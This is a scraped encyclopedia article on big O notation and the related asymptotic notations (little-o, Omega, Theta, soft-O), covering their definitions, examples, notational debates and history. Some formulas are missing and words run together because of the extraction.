BigOnotationis a mathematical notation that describes thelimiting behaviorof afunctionwhen theargumenttends towards a particular value or infinity. Big O is a member of afamily of notationsinvented by German mathematiciansPaul Bachmann,[1]Edmund Landau,[2]and others, collectively calledBachmann–Landau notationorasymptotic notation. The letter O was chosen by Bachmann to stand forOrdnung, meaning theorder of approximation. Incomputer science, big O notation is used toclassify algorithmsaccording to how their run time or space requirements[a]grow as the input size grows.[3]Inanalytic number theory, big O notation is often used to express a bound on the difference between anarithmetical functionand a better understood approximation; a famous example of such a difference is the remainder term in theprime number theorem. Big O notation is also used in many other fields to provide similar estimates. Big O notation characterizes functions according to their growth rates: different functions with the same asymptotic growth rate may be represented using the same O notation. The letter O is used because the growth rate of a function is also referred to as theorder of the function. A description of a function in terms of big O notation usually only provides anupper boundon the growth rate of the function. Associated with big O notation are several related notations, using the symbolso{\displaystyle o},Ω{\displaystyle \Omega },ω{\displaystyle \omega }, andΘ{\displaystyle \Theta }to describe other kinds of bounds on asymptotic growth rates.[3] Letf,{\displaystyle f,}the function to be estimated, be arealorcomplexvalued function, and letg,{\displaystyle g,}the comparison function, be a real valued function. Let both functions be defined on someunboundedsubsetof the positivereal numbers, andg(x){\displaystyle g(x)}be non-zero (often, but not necessarily, strictly positive) for all large enough values ofx.{\displaystyle x.}[4]One writesf(x)=O(g(x))asx→∞{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}x\to \infty }and it is read "f(x){\displaystyle f(x)}is big O ofg(x){\displaystyle g(x)}" or more often "f(x){\displaystyle f(x)}is of the order ofg(x){\displaystyle g(x)}" if theabsolute valueoff(x){\displaystyle f(x)}is at most a positive constant multiple of the absolute value ofg(x){\displaystyle g(x)}for all sufficiently large values ofx.{\displaystyle x.}That is,f(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exists a positive real numberM{\displaystyle M}and a real numberx0{\displaystyle x_{0}}such that|f(x)|≤M|g(x)|for allx≥x0.{\displaystyle |f(x)|\leq M\ |g(x)|\quad {\text{ for all }}x\geq x_{0}~.}In many contexts, the assumption that we are interested in the growth rate as the variablex{\displaystyle \ x\ }goes to infinity or to zero is left unstated, and one writes more simply thatf(x)=O(g(x)).{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}.}The notation can also be used to describe the behavior off{\displaystyle f}near some real numbera{\displaystyle a}(often,a=0{\displaystyle a=0}): we sayf(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}if there exist positive numbersδ{\displaystyle \delta }andM{\displaystyle M}such that for all definedx{\displaystyle x}with0<|x−a|<δ,{\displaystyle 0<|x-a|<\delta ,}|f(x)|≤M|g(x)|.{\displaystyle |f(x)|\leq M|g(x)|.}Asg(x){\displaystyle g(x)}is non-zero for adequately large (or small) values ofx,{\displaystyle x,}both of these definitions can be unified using thelimit 
superior:f(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}iflim supx→a|f(x)||g(x)|<∞.{\displaystyle \limsup _{x\to a}{\frac {\left|f(x)\right|}{\left|g(x)\right|}}<\infty .}And in both of these definitions thelimit pointa{\displaystyle a}(whether∞{\displaystyle \infty }or not) is acluster pointof the domains off{\displaystyle f}andg,{\displaystyle g,}i. e., in every neighbourhood ofa{\displaystyle a}there have to be infinitely many points in common. Moreover, as pointed out in the article about thelimit inferior and limit superior, thelim supx→a{\displaystyle \textstyle \limsup _{x\to a}}(at least on theextended real number line) always exists. In computer science, a slightly more restrictive definition is common:f{\displaystyle f}andg{\displaystyle g}are both required to be functions from some unbounded subset of thepositive integersto the nonnegative real numbers; thenf(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exist positive integer numbersM{\displaystyle M}andn0{\displaystyle n_{0}}such that|f(n)|≤M|g(n)|{\displaystyle |f(n)|\leq M|g(n)|}for alln≥n0.{\displaystyle n\geq n_{0}.}[5] In typical usage theO{\displaystyle O}notation is asymptotical, that is, it refers to very largex{\displaystyle x}. In this setting, the contribution of the terms that grow "most quickly" will eventually make the other ones irrelevant. As a result, the following simplification rules can be applied: For example, letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}, and suppose we wish to simplify this function, usingO{\displaystyle O}notation, to describe its growth rate asx→∞{\displaystyle x\rightarrow \infty }. This function is the sum of three terms:6x4{\displaystyle 6x^{4}},−2x3{\displaystyle -2x^{3}}, and5{\displaystyle 5}. Of these three terms, the one with the highest growth rate is the one with the largest exponent as a function ofx{\displaystyle x}, namely6x4{\displaystyle 6x^{4}}. Now one may apply the second rule:6x4{\displaystyle 6x^{4}}is a product of6{\displaystyle 6}andx4{\displaystyle x^{4}}in which the first factor does not depend onx{\displaystyle x}. Omitting this factor results in the simplified formx4{\displaystyle x^{4}}. Thus, we say thatf(x){\displaystyle f(x)}is a "big O" ofx4{\displaystyle x^{4}}. Mathematically, we can writef(x)=O(x4){\displaystyle f(x)=O(x^{4})}. One may confirm this calculation using the formal definition: letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}andg(x)=x4{\displaystyle g(x)=x^{4}}. Applying theformal definitionfrom above, the statement thatf(x)=O(x4){\displaystyle f(x)=O(x^{4})}is equivalent to its expansion,|f(x)|≤Mx4{\displaystyle |f(x)|\leq Mx^{4}}for some suitable choice of a real numberx0{\displaystyle x_{0}}and a positive real numberM{\displaystyle M}and for allx>x0{\displaystyle x>x_{0}}. To prove this, letx0=1{\displaystyle x_{0}=1}andM=13{\displaystyle M=13}. Then, for allx>x0{\displaystyle x>x_{0}}:|6x4−2x3+5|≤6x4+|2x3|+5≤6x4+2x4+5x4=13x4{\displaystyle {\begin{aligned}|6x^{4}-2x^{3}+5|&\leq 6x^{4}+|2x^{3}|+5\\&\leq 6x^{4}+2x^{4}+5x^{4}\\&=13x^{4}\end{aligned}}}so|6x4−2x3+5|≤13x4.{\displaystyle |6x^{4}-2x^{3}+5|\leq 13x^{4}.} Big O notation has two main areas of application: In both applications, the functiong(x){\displaystyle g(x)}appearing within theO(⋅){\displaystyle O(\cdot )}is typically chosen to be as simple as possible, omitting constant factors and lower order terms. 
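A throwaway numerical check of the constants chosen in the proof above (x0 = 1, M = 13); the ratio f(x)/x^4 also settles toward the leading coefficient 6, so the bound is loose but valid:

```python
f = lambda x: 6 * x**4 - 2 * x**3 + 5

for x in [1, 2, 10, 100, 10_000]:
    assert abs(f(x)) <= 13 * x**4      # |f(x)| <= M x^4 holds for all x >= x0 = 1
    print(x, f(x) / x**4)              # 9.0, 5.3125, 5.8005, ... -> tends to 6
```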
There are two formally close, but noticeably different, usages of this notation: infinite asymptotics and infinitesimal asymptotics.[citation needed] This distinction is only in application and not in principle, however—the formal definition for the "big O" is the same for both cases, only with different limits for the function argument.[original research?] Big O notation is useful whenanalyzing algorithmsfor efficiency. For example, the time (or the number of steps) it takes to complete a problem of sizen{\displaystyle n}might be found to beT(n)=4n2−2n+2{\displaystyle T(n)=4n^{2}-2n+2}. Asn{\displaystyle n}grows large, then2{\displaystyle n^{2}}termwill come to dominate, so that all other terms can be neglected—for instance whenn=500{\displaystyle n=500}, the term4n2{\displaystyle 4n^{2}}is 1000 times as large as the2n{\displaystyle 2n}term. Ignoring the latter would have negligible effect on the expression's value for most purposes. Further, thecoefficientsbecome irrelevant if we compare to any otherorderof expression, such as an expression containing a termn3{\displaystyle n^{3}}orn4{\displaystyle n^{4}}. Even ifT(n)=1000000n2{\displaystyle T(n)=1000000n^{2}}, ifU(n)=n3{\displaystyle U(n)=n^{3}}, the latter will always exceed the former oncengrows larger than1000000{\displaystyle 1000000},viz.T(1000000)=10000003=U(1000000){\displaystyle T(1000000)=1000000^{3}=U(1000000)}. Additionally, the number of steps depends on the details of the machine model on which the algorithm runs, but different types of machines typically vary by only a constant factor in the number of steps needed to execute an algorithm. So the big O notation captures what remains: we write eitherT(n) =O(n2) orT(n) ∈O(n2) and say that the algorithm hasorder ofn2time complexity. The sign "=" is not meant to express "is equal to" in its normal mathematical sense, but rather a more colloquial "is", so the second expression is sometimes considered more accurate (see the "Equals sign" discussion below) while the first is considered by some as anabuse of notation.[6] Big O can also be used to describe theerror termin an approximation to a mathematical function. The most significant terms are written explicitly, and then the least-significant terms are summarized in a single big O term. Consider, for example, theexponential seriesand two expressions of it that are valid whenxis small:ex=1+x+x22!+x33!+x44!+⋯for all finitex=1+x+x22+O(x3)asx→0=1+x+O(x2)asx→0{\displaystyle {\begin{aligned}e^{x}&=1+x+{\frac {x^{2}}{2!}}+{\frac {x^{3}}{3!}}+{\frac {x^{4}}{4!}}+\dotsb &&{\text{for all finite }}x\\[4pt]&=1+x+{\frac {x^{2}}{2}}+O(x^{3})&&{\text{as }}x\to 0\\[4pt]&=1+x+O(x^{2})&&{\text{as }}x\to 0\end{aligned}}}The middle expression (the one withO(x3){\displaystyle O(x^{3})}) means the absolute-value of the errorex−(1+x+x22){\displaystyle e^{x}-(1+x+{\frac {x^{2}}{2}})}is at most some constant times|x3|{\displaystyle |x^{3}|}whenx{\displaystyle x}is close enough to0{\displaystyle 0}. If the functionfcan be written as a finite sum of other functions, then the fastest growing one determines the order off(n). For example, In particular, if a function may be bounded by a polynomial inn, then asntends toinfinity, one may disregardlower-orderterms of the polynomial. The setsO(n^c)andO(c^n)are very different. Ifcis greater than one, then the latter grows much faster. A function that grows faster thann^cfor anycis calledsuperpolynomial. One that grows more slowly than any exponential function of the formc^nis calledsubexponential. 
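Returning to the running-time example T(n) = 4n^2 − 2n + 2 above, a short numerical sketch shows what the statement T(n) = O(n^2) records: the ratio T(n)/n^2 stays bounded (and in fact settles near the leading coefficient 4), while the discarded lower-order terms become irrelevant:

```python
T = lambda n: 4 * n**2 - 2 * n + 2

for n in [10, 100, 10_000, 1_000_000]:
    print(n, T(n) / n**2)   # 3.82, 3.9802, 3.9998..., 3.999998... -> bounded by a constant
```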
An algorithm can require time that is both superpolynomial and subexponential; examples of this include the fastest known algorithms forinteger factorizationand the functionn^(log n). We may ignore any powers ofninside of the logarithms. The setO(logn)is exactly the same asO(log(n^c)). The logarithms differ only by a constant factor (sincelog(n^c) =clogn) and thus the big O notation ignores that. Similarly, logs with different constant bases are equivalent. On the other hand, exponentials with different bases are not of the same order. For example,2^nand3^nare not of the same order. Changing units may or may not affect the order of the resulting algorithm. Changing units is equivalent to multiplying the appropriate variable by a constant wherever it appears. For example, if an algorithm runs in the order ofn^2, replacingnbycnmeans the algorithm runs in the order ofc^2n^2, and the big O notation ignores the constantc^2. This can be written asc^2n^2= O(n^2). If, however, an algorithm runs in the order of2^n, replacingnwithcngives2^(cn)= (2^c)^n. This is not equivalent to2^nin general. Changing variables may also affect the order of the resulting algorithm. For example, if an algorithm's run time isO(n)when measured in terms of the numbernofdigitsof an input numberx, then its run time isO(logx)when measured as a function of the input numberxitself, becausen=O(logx). Iff1=O(g1){\displaystyle f_{1}=O(g_{1})}andf2=O(g2){\displaystyle f_{2}=O(g_{2})}thenf1+f2=O(max(|g1|,|g2|)){\displaystyle f_{1}+f_{2}=O(\max(|g_{1}|,|g_{2}|))}. It follows that iff1=O(g){\displaystyle f_{1}=O(g)}andf2=O(g){\displaystyle f_{2}=O(g)}thenf1+f2∈O(g){\displaystyle f_{1}+f_{2}\in O(g)}. Letkbe a nonzero constant. ThenO(|k|⋅g)=O(g){\displaystyle O(|k|\cdot g)=O(g)}. In other words, iff=O(g){\displaystyle f=O(g)}, thenk⋅f=O(g).{\displaystyle k\cdot f=O(g).} BigO(and little o, Ω, etc.) can also be used with multiple variables. To define bigOformally for multiple variables, supposef{\displaystyle f}andg{\displaystyle g}are two functions defined on some subset ofRn{\displaystyle \mathbb {R} ^{n}}. We say if and only if there exist constantsM{\displaystyle M}andC>0{\displaystyle C>0}such that|f(x)|≤C|g(x)|{\displaystyle |f(\mathbf {x} )|\leq C|g(\mathbf {x} )|}for allx{\displaystyle \mathbf {x} }withxi≥M{\displaystyle x_{i}\geq M}for somei.{\displaystyle i.}[7]Equivalently, the condition thatxi≥M{\displaystyle x_{i}\geq M}for somei{\displaystyle i}can be written‖x‖∞≥M{\displaystyle \|\mathbf {x} \|_{\infty }\geq M}, where‖x‖∞{\displaystyle \|\mathbf {x} \|_{\infty }}denotes theChebyshev norm. For example, the statement asserts that there exist constantsCandMsuch that whenever eitherm≥M{\displaystyle m\geq M}orn≥M{\displaystyle n\geq M}holds. This definition allows all of the coordinates ofx{\displaystyle \mathbf {x} }to increase to infinity. In particular, the statement (i.e.,∃C∃M∀n∀m⋯{\displaystyle \exists C\,\exists M\,\forall n\,\forall m\,\cdots }) is quite different from (i.e.,∀m∃C∃M∀n⋯{\displaystyle \forall m\,\exists C\,\exists M\,\forall n\,\cdots }). Under this definition, the subset on which a function is defined is significant when generalizing statements from the univariate setting to the multivariate setting. For example, iff(n,m)=1{\displaystyle f(n,m)=1}andg(n,m)=n{\displaystyle g(n,m)=n}, thenf(n,m)=O(g(n,m)){\displaystyle f(n,m)=O(g(n,m))}if we restrictf{\displaystyle f}andg{\displaystyle g}to[1,∞)2{\displaystyle [1,\infty )^{2}}, but not if they are defined on[0,∞)2{\displaystyle [0,\infty )^{2}}. 
This is not the only generalization of big O to multivariate functions, and in practice, there is some inconsistency in the choice of definition.[8] The statement "f(x)isO[g(x)]" as defined above is usually written asf(x) =O[g(x)]. Some consider this to be anabuse of notation, since the use of the equals sign could be misleading as it suggests a symmetry that this statement does not have. Asde Bruijnsays,O[x] =O[x2]is true butO[x2] =O[x]is not.[9]Knuthdescribes such statements as "one-way equalities", since if the sides could be reversed, "we could deduce ridiculous things liken=n2from the identitiesn=O[n2]andn2=O[n2]".[10]In another letter, Knuth also pointed out that[11] the equality sign is not symmetric with respect to such notations [as, in this notation,] mathematicians customarily use the '=' sign as they use the word 'is' in English: Aristotle is a man, but a man isn't necessarily Aristotle. For these reasons, it would be more precise to useset notationand writef(x) ∈O[g(x)]– read as: "f(x)is an element ofO[g(x)]", or "f(x)is in the setO[g(x)]" – thinking ofO[g(x)]as the class of all functionsh(x)such that|h(x)| ≤C|g(x)|for some positive real numberC.[10]However, the use of the equals sign is customary.[9][10] Big O notation can also be used in conjunction with other arithmetic operators in more complicated equations. For example,h(x) +O(f(x))denotes the collection of functions having the growth ofh(x)plus a part whose growth is limited to that off(x). Thus,g(x)=h(x)+O(f(x)){\displaystyle g(x)=h(x)+O(f(x))}expresses the same asg(x)−h(x)=O(f(x)).{\displaystyle g(x)-h(x)=O(f(x)).} Suppose analgorithmis being developed to operate on a set ofnelements. Its developers are interested in finding a functionT(n)that will express how long the algorithm will take to run (in some arbitrary measurement of time) in terms of the number of elements in the input set. The algorithm works by first calling a subroutine to sort the elements in the set and then perform its own operations. The sort has a known time complexity ofO(n2), and after the subroutine runs the algorithm must take an additional55n3+ 2n+ 10steps before it terminates. Thus the overall time complexity of the algorithm can be expressed asT(n) = 55n3+O(n2). Here the terms2n+ 10are subsumed within the faster-growingO(n2). Again, this usage disregards some of the formal meaning of the "=" symbol, but it does allow one to use the big O notation as a kind of convenient placeholder. In more complicated usage,O(·)can appear in different places in an equation, even several times on each side. For example, the following are true forn→∞{\displaystyle n\to \infty }:(n+1)2=n2+O(n),(n+O(n1/2))⋅(n+O(log⁡n))2=n3+O(n5/2),nO(1)=O(en).{\displaystyle {\begin{aligned}(n+1)^{2}&=n^{2}+O(n),\\(n+O(n^{1/2}))\cdot (n+O(\log n))^{2}&=n^{3}+O(n^{5/2}),\\n^{O(1)}&=O(e^{n}).\end{aligned}}}The meaning of such statements is as follows: foranyfunctions which satisfy eachO(·)on the left side, there aresomefunctions satisfying eachO(·)on the right side, such that substituting all these functions into the equation makes the two sides equal. For example, the third equation above means: "For any functionf(n) =O(1), there is some functiong(n) =O(en)such thatnf(n)=g(n)". In terms of the "set notation" above, the meaning is that the class of functions represented by the left side is a subset of the class of functions represented by the right side. In this use the "=" is a formal symbol that unlike the usual use of "=" is not asymmetric relation. 
Thus for examplenO(1)=O(en)does not imply the false statementO(en) =nO(1). Big O is typeset as an italicized uppercase "O", as in the following example:O(n2){\displaystyle O(n^{2})}.[12][13]InTeX, it is produced by simply typing 'O' inside math mode. Unlike Greek-named Bachmann–Landau notations, it needs no special symbol. However, some authors use the calligraphic variantO{\displaystyle {\mathcal {O}}}instead.[14][15] Here is a list of classes of functions that are commonly encountered when analyzing the running time of an algorithm. In each case,cis a positive constant andnincreases without bound. The slower-growing functions are generally listed first. The statementf(n)=O(n!){\displaystyle f(n)=O(n!)}is sometimes weakened tof(n)=O(nn){\displaystyle f(n)=O\left(n^{n}\right)}to derive simpler formulas for asymptotic complexity. For anyk>0{\displaystyle k>0}andc>0{\displaystyle c>0},O(nc(log⁡n)k){\displaystyle O(n^{c}(\log n)^{k})}is a subset ofO(nc+ε){\displaystyle O(n^{c+\varepsilon })}for anyε>0{\displaystyle \varepsilon >0}, and so may be regarded as a polynomial of slightly larger order. BigOis widely used in computer science. Together with some other related notations, it forms the family of Bachmann–Landau notations.[citation needed] Intuitively, the assertion "f(x)iso(g(x))" (read "f(x)is little-o ofg(x)" or "f(x)is of inferior order tog(x)") means thatg(x)grows much faster thanf(x), or equivalentlyf(x)grows much slower thang(x). As before, letfbe a real or complex valued function andga real valued function, both defined on some unbounded subset of the positivereal numbers, such thatg(x){\displaystyle g(x)}is strictly positive for all large enough values ofx. One writes if for every positive constantεthere exists a constantx0{\displaystyle x_{0}}such that For example, one has The difference between thedefinition of the big-O notationand the definition of little-o is that while the former has to be true forat least oneconstantM, the latter must hold foreverypositive constantε, however small.[18]In this way, little-o notation makes astronger statementthan the corresponding big-O notation: every function that is little-o ofgis also big-O ofg, but not every function that is big-O ofgis little-o ofg. For example,2x2=O(x2){\displaystyle 2x^{2}=O(x^{2})}but2x2≠o(x2){\displaystyle 2x^{2}\neq o(x^{2})}. Ifg(x){\displaystyle g(x)}is nonzero, or at least becomes nonzero beyond a certain point, the relationf(x)=o(g(x)){\displaystyle f(x)=o(g(x))}is equivalent to Little-o respects a number of arithmetic operations. For example, It also satisfies atransitivityrelation: Little-o can also be generalized to the finite case:[19] f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iff(x)=α(x)g(x){\displaystyle f(x)=\alpha (x)g(x)}for someα(x){\displaystyle \alpha (x)}withlimx→x0α(x)=0{\displaystyle \lim _{x\to x_{0}}\alpha (x)=0}. Or, ifg(x){\displaystyle g(x)}is nonzero in a neighbourhood aroundx0{\displaystyle x_{0}}: f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iflimx→x0f(x)g(x)=0{\displaystyle \lim _{x\to x_{0}}{\frac {f(x)}{g(x)}}=0}. This definition is especially useful in the computation oflimitsusingTaylor series. 
For example: sin⁡x=x−x33!+…=x+o(x2)asx→0{\displaystyle \sin x=x-{\frac {x^{3}}{3!}}+\ldots =x+o(x^{2}){\text{ as }}x\to 0}, solimx→0sin⁡xx=limx→0x+o(x2)x=limx→01+o(x)=1{\displaystyle \lim _{x\to 0}{\frac {\sin x}{x}}=\lim _{x\to 0}{\frac {x+o(x^{2})}{x}}=\lim _{x\to 0}1+o(x)=1} Another asymptotic notation isΩ{\displaystyle \Omega }, read "big omega".[20]There are two widespread and incompatible definitions of the statement whereais some real number,∞{\displaystyle \infty }, or−∞{\displaystyle -\infty }, wherefandgare real functions defined in a neighbourhood ofa, and wheregis positive in this neighbourhood. The Hardy–Littlewood definition is used mainly inanalytic number theory, and the Knuth definition mainly incomputational complexity theory; the definitions are not equivalent. In 1914G.H. HardyandJ.E. Littlewoodintroduced the new symbolΩ,{\displaystyle \ \Omega \ ,}[21]which is defined as follows: Thusf(x)=Ω(g(x)){\displaystyle ~f(x)=\Omega {\bigl (}\ g(x)\ {\bigr )}~}is the negation off(x)=o(g(x)).{\displaystyle ~f(x)=o{\bigl (}\ g(x)\ {\bigr )}~.} In 1916 the same authors introduced the two new symbolsΩR{\displaystyle \ \Omega _{R}\ }andΩL,{\displaystyle \ \Omega _{L}\ ,}defined as:[22] These symbols were used byE. Landau, with the same meanings, in 1924.[23]Authors that followed Landau, however, use a different notation for the same definitions:[citation needed]The symbolΩR{\displaystyle \ \Omega _{R}\ }has been replaced by the current notationΩ+{\displaystyle \ \Omega _{+}\ }with the same definition, andΩL{\displaystyle \ \Omega _{L}\ }becameΩ−.{\displaystyle \ \Omega _{-}~.} These three symbolsΩ,Ω+,Ω−,{\displaystyle \ \Omega \ ,\Omega _{+}\ ,\Omega _{-}\ ,}as well asf(x)=Ω±(g(x)){\displaystyle \ f(x)=\Omega _{\pm }{\bigl (}\ g(x)\ {\bigr )}\ }(meaning thatf(x)=Ω+(g(x)){\displaystyle \ f(x)=\Omega _{+}{\bigl (}\ g(x)\ {\bigr )}\ }andf(x)=Ω−(g(x)){\displaystyle \ f(x)=\Omega _{-}{\bigl (}\ g(x)\ {\bigr )}\ }are both satisfied), are now currently used inanalytic number theory.[24][25] We have and more precisely We have and more precisely however In 1976Donald Knuthpublished a paper to justify his use of theΩ{\displaystyle \Omega }-symbol to describe a stronger property.[26]Knuth wrote: "For all the applications I have seen so far in computer science, a stronger requirement ... is much more appropriate". He defined with the comment: "Although I have changed Hardy and Littlewood's definition ofΩ{\displaystyle \Omega }, I feel justified in doing so because their definition is by no means in wide use, and because there are other ways to say what they want to say in the comparatively rare cases when their definition applies."[26] The limit definitions assumeg(n)>0{\displaystyle g(n)>0}for sufficiently largen{\displaystyle n}. The table is (partly) sorted from smallest to largest, in the sense thato,O,Θ,∼,{\displaystyle o,O,\Theta ,\sim ,}(Knuth's version of)Ω,ω{\displaystyle \Omega ,\omega }on functions correspond to<,≤,≈,=,{\displaystyle <,\leq ,\approx ,=,}≥,>{\displaystyle \geq ,>}on the real line[29](the Hardy–Littlewood version ofΩ{\displaystyle \Omega }, however, doesn't correspond to any such description). 
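For reference, the two competing definitions discussed here, together with the 1916 one-sided symbols, are commonly stated as follows (standard formulations, supplied because the displayed definitions are not reproduced in the text above):

```latex
% Hardy–Littlewood (1914, 1916), as used in analytic number theory:
f(x)=\Omega\bigl(g(x)\bigr)     \iff \limsup_{x\to\infty}\frac{|f(x)|}{g(x)}>0,
\qquad
f(x)=\Omega_{+}\bigl(g(x)\bigr) \iff \limsup_{x\to\infty}\frac{f(x)}{g(x)}>0,
\qquad
f(x)=\Omega_{-}\bigl(g(x)\bigr) \iff \liminf_{x\to\infty}\frac{f(x)}{g(x)}<0.

% Knuth (1976), as used in computational complexity theory:
f(n)=\Omega\bigl(g(n)\bigr) \iff g(n)=O\bigl(f(n)\bigr)
\iff \exists\,c>0,\ \exists\,n_0:\ f(n)\ge c\,g(n)\ \text{for all } n\ge n_0 .
```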
Computer science uses the bigO{\displaystyle O}, big ThetaΘ{\displaystyle \Theta }, littleo{\displaystyle o}, little omegaω{\displaystyle \omega }and Knuth's big OmegaΩ{\displaystyle \Omega }notations.[30]Analytic number theory often uses the bigO{\displaystyle O}, smallo{\displaystyle o}, Hardy's≍{\displaystyle \asymp },[31]Hardy–Littlewood's big OmegaΩ{\displaystyle \Omega }(with or without the +, − or ± subscripts) and∼{\displaystyle \sim }notations.[24]The small omegaω{\displaystyle \omega }notation is not used as often in analysis.[32] Informally, especially in computer science, the bigOnotation often can be used somewhat differently to describe an asymptotictightbound where using big Theta Θ notation might be more factually appropriate in a given context.[33]For example, when considering a functionT(n) = 73n3+ 22n2+ 58, all of the following are generally acceptable, but tighter bounds (such as numbers 2 and 3 below) are usually strongly preferred over looser bounds (such as number 1 below): (1)T(n) =O(n^100), (2)T(n) =O(n^3), (3)T(n) = Θ(n^3). The equivalent English statements are respectively: (1)T(n) grows asymptotically no faster thann^100, (2)T(n) grows asymptotically no faster thann^3, (3)T(n) grows asymptotically as fast asn^3. So while all three statements are true, progressively more information is contained in each. In some fields, however, the big O notation (number 2 in the lists above) would be used more commonly than the big Theta notation (items numbered 3 in the lists above). For example, ifT(n) represents the running time of a newly developed algorithm for input sizen, the inventors and users of the algorithm might be more inclined to put an upper asymptotic bound on how long it will take to run without making an explicit statement about the lower asymptotic bound. In their bookIntroduction to Algorithms,Cormen,Leiserson,RivestandSteinconsider the set of functionsfwhich satisfy In a correct notation this set can, for instance, be calledO(g), where O(g)={f:there exist positive constantscandn0such that0≤f(n)≤cg(n)for alln≥n0}.{\displaystyle O(g)=\{f:{\text{there exist positive constants}}~c~{\text{and}}~n_{0}~{\text{such that}}~0\leq f(n)\leq cg(n){\text{ for all }}n\geq n_{0}\}.}[34] The authors state that the use of the equality operator (=) to denote set membership rather than the set membership operator (∈) is an abuse of notation, but that doing so has advantages.[6]Inside an equation or inequality, the use of asymptotic notation stands for an anonymous function in the setO(g), which eliminates lower-order terms, and helps to reduce inessential clutter in equations, for example:[35] Another notation sometimes used in computer science isÕ(readsoft-O), which hides polylogarithmic factors. There are two definitions in use: some authors usef(n) =Õ(g(n)) asshorthandforf(n) =O(g(n) log^kn)for somek, while others use it as shorthand forf(n) =O(g(n) log^kg(n)).[36]Wheng(n)is polynomial inn, there is no difference; however, the latter definition allows one to say, e.g. thatn2n=O~(2n){\displaystyle n2^{n}={\tilde {O}}(2^{n})}while the former definition allows forlogk⁡n=O~(1){\displaystyle \log ^{k}n={\tilde {O}}(1)}for any constantk. Some authors writeO*for the same purpose as the latter definition.[37]Essentially, it is bigOnotation, ignoringlogarithmic factorsbecause thegrowth-rateeffects of some other super-logarithmic function indicate a growth-rate explosion for large-sized input parameters that is more important to predicting bad run-time performance than the finer-point effects contributed by the logarithmic-growth factor(s). 
This notation is often used to obviate the "nitpicking" within growth-rates that are stated as too tightly bounded for the matters at hand (since log^knis alwayso(n^ε) for any constantkand anyε> 0). Also, theLnotation, defined asLn[α,c] =e(c+o(1))(ln⁡n)α(ln⁡ln⁡n)1−α{\displaystyle L_{n}[\alpha ,c]=e^{(c+o(1))(\ln n)^{\alpha }(\ln \ln n)^{1-\alpha }}}, is convenient for functions that are betweenpolynomialandexponentialin terms ofln⁡n{\displaystyle \ln n}. The generalization to functions taking values in anynormed vector spaceis straightforward (replacing absolute values by norms), wherefandgneed not take their values in the same space. A generalization to functionsgtaking values in anytopological groupis also possible[citation needed]. The "limiting process"x→xocan also be generalized by introducing an arbitraryfilter base, i.e. to directednetsfandg. Theonotation can be used to definederivativesanddifferentiabilityin quite general spaces, and also (asymptotical) equivalence of functions, which is anequivalence relationand a more restrictive notion than the relationship "fis Θ(g)" from above. (It reduces to limf/g= 1 iffandgare positive real valued functions.) For example, 2xis Θ(x), but2x−xis noto(x). The symbol O was first introduced by number theoristPaul Bachmannin 1894, in the second volume of his bookAnalytische Zahlentheorie("analytic number theory").[1]The number theoristEdmund Landauadopted it, and was thus inspired to introduce in 1909 the notation o;[2]hence both are now called Landau symbols. These notations were used in applied mathematics during the 1950s for asymptotic analysis.[38]The symbolΩ{\displaystyle \Omega }(in the sense "is not anoof") was introduced in 1914 by Hardy and Littlewood.[21]Hardy and Littlewood also introduced in 1916 the symbolsΩR{\displaystyle \Omega _{R}}("right") andΩL{\displaystyle \Omega _{L}}("left"),[22]precursors of the modern symbolsΩ+{\displaystyle \Omega _{+}}("is not smaller than a small o of") andΩ−{\displaystyle \Omega _{-}}("is not larger than a small o of"). Thus the Omega symbols (with their original meanings) are sometimes also referred to as "Landau symbols". This notationΩ{\displaystyle \Omega }became commonly used in number theory at least since the 1950s.[39] The symbol∼{\displaystyle \sim }, although it had been used before with different meanings,[29]was given its modern definition by Landau in 1909[40]and by Hardy in 1910.[41]Just above on the same page of his tract Hardy defined the symbol≍{\displaystyle \asymp }, wheref(x)≍g(x){\displaystyle f(x)\asymp g(x)}means that bothf(x)=O(g(x)){\displaystyle f(x)=O(g(x))}andg(x)=O(f(x)){\displaystyle g(x)=O(f(x))}are satisfied. The notation is still currently used in analytic number theory.[42][31]In his tract Hardy also proposed the symbol≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }, wheref≍−g{\displaystyle f\mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} g}means thatf∼Kg{\displaystyle f\sim Kg}for some constantK≠0{\displaystyle K\not =0}. In the 1970s the big O was popularized in computer science byDonald Knuth, who proposed the different notationf(x)=Θ(g(x)){\displaystyle f(x)=\Theta (g(x))}for Hardy'sf(x)≍g(x){\displaystyle f(x)\asymp g(x)}, and proposed a different definition for the Hardy and Littlewood Omega notation.[26] Two other symbols coined by Hardy were (in terms of the modernOnotation)f≼g, meaningf=O(g), andf≺g, meaningf=o(g) (Hardy however never defined or used the notation≺≺{\displaystyle \prec \!\!\prec }, nor≪{\displaystyle \ll }, as it has been sometimes reported). 
